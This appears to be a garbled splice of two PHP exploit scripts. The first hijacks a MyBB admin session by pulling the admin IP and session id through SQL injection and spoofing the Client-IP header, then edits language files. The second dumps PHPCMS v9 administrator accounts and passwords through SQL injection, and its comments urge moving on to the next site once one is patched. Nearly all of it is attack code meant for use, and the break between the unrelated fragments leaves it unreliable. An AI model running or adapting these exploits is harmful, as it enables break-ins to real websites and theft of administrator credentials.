# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA # ip: 127.0.0.1 # dateline: 1175443967 # lastactive: 1175444369 # # $xpl->addheader('Client-IP','127.0.0.1'); # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9'); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # I decided to use the solution number 2. # We can also add an administrator (easily) ... but it's not interesting. # print "\nAdmin IP : "; $ip = sql_inject('ip'); print "\nAdmin sid: "; $sid = sql_inject('sid'); print "\nTrying to be logged in as administrator"; $xpl->addheader('Client-IP', $ip); $xpl->get($url . "admin/languages.php?adminsid={$sid}"); # Trying to find the language if (preg_match('#<input type="hidden" name="lang" value="(\\S*)"#', $xpl->getcontent(), $langmatches)) { $lang = $langmatches[1]; } else { $lang = 'english'; } print "\nLanguage: {$lang}"; # Language configuration $xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}"); preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value); # We can't use: # - <? OR <?php
Example: php ' . $argv[0] . ' http://www.waitalone.cn/ +-------------------------------------------------------------+ '); exit; } error_reporting(0); //统计时间 $start_time = func_time(); $phpcmsv9 = $argv[1]; if (substr($phpcmsv9, -1) != '/') { $phpcmsv9 .= '/'; } //请先添加cookie $cookie = 'PHPSESSID=opphk3ors2sf2m1bqg148fmue5'; //核心代码,注入获取管理员账号及密码 $sql_admin = sql_inject(); $count = count($sql_admin); if ($count != 0) { echo '恭喜大爷,成功获取到[ ' . $count . ' ]个管理员账号!' . "\n\n"; foreach ($sql_admin as $num => $admin) { echo '管理员' . ($num + 1) . ' => ' . $admin . PHP_EOL; } } else { exit('杯具了大爷,此站漏洞已经修补,请秒下一个!'); } //发送数据包函数 function get_data($target) { //控制http发包参数 global $cookie; $opts = array('http' => array('method' => "GET", 'timeout' => 30, 'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0\r\n" . "Cookie: {$cookie}\r\n"));